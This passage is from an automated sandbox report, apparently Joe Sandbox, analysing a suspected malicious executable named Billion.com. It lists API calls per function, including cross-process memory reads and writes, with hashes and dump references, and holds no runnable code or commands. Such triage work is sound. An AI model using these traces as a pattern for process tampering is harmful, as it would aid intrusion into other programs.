                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAE4
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DAF6
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DB08
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DB1A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d460d88d9f1513c4dcfd98ba26c5f707163a3f05a2ab9d1f9b5028cd2bd6b72b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7015dd97c1d9210a607d74f3017e03cfa32485b98709fb748a267021a96c05da
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d460d88d9f1513c4dcfd98ba26c5f707163a3f05a2ab9d1f9b5028cd2bd6b72b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF01D32A48604AB8624EBA9FD82C3A77EEFF157907A50C45F009D7941CB30FCA0CA64
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016262E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162640
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162653
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162664
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00162675
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e10ddf55cb32d15d2f945d546f87ab6cd9820c3a9a5d61b6aeaaa81c4265ecd4
                                                                                                                                                                                                                                                                                                          • Instruction ID: ad41e1e683a44e6fb89a8060aed14ebf75460aa705f258eb1c8c42eb5750ad5d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e10ddf55cb32d15d2f945d546f87ab6cd9820c3a9a5d61b6aeaaa81c4265ecd4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0DA70801B219BCB02AFD4FC0D8683BA5BB257A1305091BF814D6676CB310961BF85
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                          • Opcode ID: e4412c9d91f8621f8e6504e2a8147a185e15daa9026c142a62a0a6f762fe106c
                                                                                                                                                                                                                                                                                                          • Instruction ID: ba539f88e4efbccb6b1d264b28894a01591f5c99c7c582cab50c01794bcdc592
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4412c9d91f8621f8e6504e2a8147a185e15daa9026c142a62a0a6f762fe106c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADD11479900206FBCB289F68CC55BFAB7B1FF16310F2D415AE9029B250D7B59DA0CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00192B1D,?,?,00000034,00000800,?,00000034), ref: 0019BDF4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001930AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00192B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0019BDBF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0019BD1C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00192AE1,00000034,?,?,00001004,00000000,00000000), ref: 0019BD2C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00192AE1,00000034,?,?,00001004,00000000,00000000), ref: 0019BD42
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0019311A
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00193167
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6982e4af51900145163ba1bcf1c5629b5b2c32fcfadbaca703d255eb1e35803
                                                                                                                                                                                                                                                                                                          • Instruction ID: a686b8bd78e85cb9fa99caa067de0d6f6e386c63f6b451d601890c1f73b6b2a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6982e4af51900145163ba1bcf1c5629b5b2c32fcfadbaca703d255eb1e35803
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4412772900218BEDF10DBA4DD85AEEBBB8EF59704F0040A5FA55B7190DB70AF85CB61
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\680662\Billion.com,00000104), ref: 00161AD9
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00161BA4
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00161BAE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                          • API String ID: 2506810119-140972201
                                                                                                                                                                                                                                                                                                          • Opcode ID: e1cfac10d2a0b7966a8c96586f49cb380511b169ff4f2c6e6d96165a2b4a34ce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7502e048dc82af2582b267e5daebcb0198b7ab5ea29de4baf5d172bf0917450e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1cfac10d2a0b7966a8c96586f49cb380511b169ff4f2c6e6d96165a2b4a34ce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F317071A00218FFCB21DF99DC89D9EBBFCEF95710B1841A6E80497211E7708E55DB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0019CBB1
                                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0019CBF7
                                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002029C0,00C15120), ref: 0019CC40
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001CDCD0,00000000,?,?,?,?), ref: 001C4F48
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32 ref: 001C4F65
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001C4F75
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001B3AD4,?,?), ref: 001B3DD5
                                                                                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B3AF8
                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 001B3B63
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001C49DC
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001C49F0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C4A14
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001C51A3
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001C51B1
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001C51B8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001C42DC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001C42EC
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001C4312
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001A544D
                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001A54A1
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,001CDCD0), ref: 001A5515
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 001C8339
                                                                                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,001C802F,00000000), ref: 001C83B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                          • String ID: ( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 3814560230-615512911
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001C4CED
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001C4D02
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001C4D0F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                          • Opcode ID: fc2a8ff4807f755b20c2b118820312b55911b070a59ada26f4f7e145880f74a1
                                                                                                                                                                                                                                                                                                          • Instruction ID: e201078dda0ca85b01f416e91c1531aa528b6407029701e497e67779980ccf59
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc2a8ff4807f755b20c2b118820312b55911b070a59ada26f4f7e145880f74a1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04110671244248BFEF205F65DC06FBB7BA8EFA5B65F110528FA51E20A0C771DC509B20
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00193712
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00193723
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: GetCurrentThreadId.KERNEL32 ref: 0019372A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00193731
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001938C4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019373B: GetParent.USER32(00000000), ref: 00193746
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0019390F
                                                                                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,00193987), ref: 00193937
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cfd41e51e2b6c945864a1508b1b9016fdf28207b68ccf634df28c302a1fe87e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97f7bf33ce67b8c50ff47616952485cd21edc9fafd9deaade5ecba71683419ac
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfd41e51e2b6c945864a1508b1b9016fdf28207b68ccf634df28c302a1fe87e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F118771600205ABCF11BF749C85FEE77A9AFA4304F048079F9599B292DF709A45DB30
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00135A34
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,001337B8,?,?,?,?,?,00133709,?,?), ref: 00135A91
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                          • String ID: <) $<)
                                                                                                                                                                                                                                                                                                          • API String ID: 2587070983-1858400284
                                                                                                                                                                                                                                                                                                          • Opcode ID: da5f0a81c46d6b03e3488d6ee30eba88293e574a825097e87bdb2ac28e3a275f
                                                                                                                                                                                                                                                                                                          • Instruction ID: dc328ed0157ab5492a43d196854d5761efe56cb42266ed546b2d9e03db1baf70
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da5f0a81c46d6b03e3488d6ee30eba88293e574a825097e87bdb2ac28e3a275f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C21ED34216B09CFDB18DB19F89CB2537F2BB54B15F25415BF84697262CB349C48DB01
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001C6360
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001C638D
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 001C639C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: e884aeaab42d244c09d70437716f5b26a25a796563d6e854b39ffbefae77775c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 150779beb1d2f32ddc2094519d1b4cdccb435952e04d8cb364ec1307542136c8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e884aeaab42d244c09d70437716f5b26a25a796563d6e854b39ffbefae77775c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE016D71500258EFDB119F51DC84FAE7BB5FF58351F108099E849DA151DB30CA85EF21
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,002028E0,001CAD55,000000FC,?,00000000,00000000,?), ref: 001C823F
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001C8247
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 001C82B4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
